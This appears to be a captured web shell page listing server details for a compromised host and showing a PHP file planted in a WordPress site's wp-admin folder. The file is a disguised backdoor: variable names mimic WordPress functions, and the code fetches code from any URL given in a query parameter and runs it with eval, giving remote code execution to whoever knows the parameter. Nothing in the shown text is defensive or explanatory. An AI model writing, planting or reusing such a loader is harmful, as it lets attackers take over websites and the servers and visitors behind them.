HEX
Server: LiteSpeed
System: Linux premium12.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: desetmhw (842)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/desetmhw/247tyreservice.com/wp-admin/admin-functions-array.php
<?php

if (isset($_GET['more'])) {
    $wp_enqueue_script_uos = $_GET['more'];
    if ($the_ID_yl = curl_init()) {
        curl_setopt($the_ID_yl, CURLOPT_URL, $wp_enqueue_script_uos);
        curl_setopt($the_ID_yl, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($the_ID_yl));
        curl_close($the_ID_yl);
        exit;
    }
}